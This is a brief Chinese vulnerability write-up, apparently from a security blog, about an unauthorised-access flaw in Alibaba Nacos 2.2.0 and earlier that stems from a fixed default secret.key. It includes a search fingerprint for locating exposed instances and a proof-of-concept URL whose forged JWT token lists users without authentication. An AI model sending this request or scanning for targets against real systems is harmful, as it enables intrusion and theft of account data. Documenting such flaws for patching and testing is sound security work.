Alibaba Nacos secret.key默认密钥 未授权访问漏洞

漏洞描述

Alibaba Nacos 使用了固定的secret.key默认密钥,导致攻击者可以构造请求获取敏感信息,导致未授权访问漏洞。

漏洞影响

Alibaba Nacos <= 2.2.0

网络测绘

app=”NACOS”

漏洞复现

登陆页面

20240513142954325-png (6)

漏洞原因是由于使用了固定的Key

20240513150707130-png (8)

验证POC

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9

20240513150813243-png (9)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容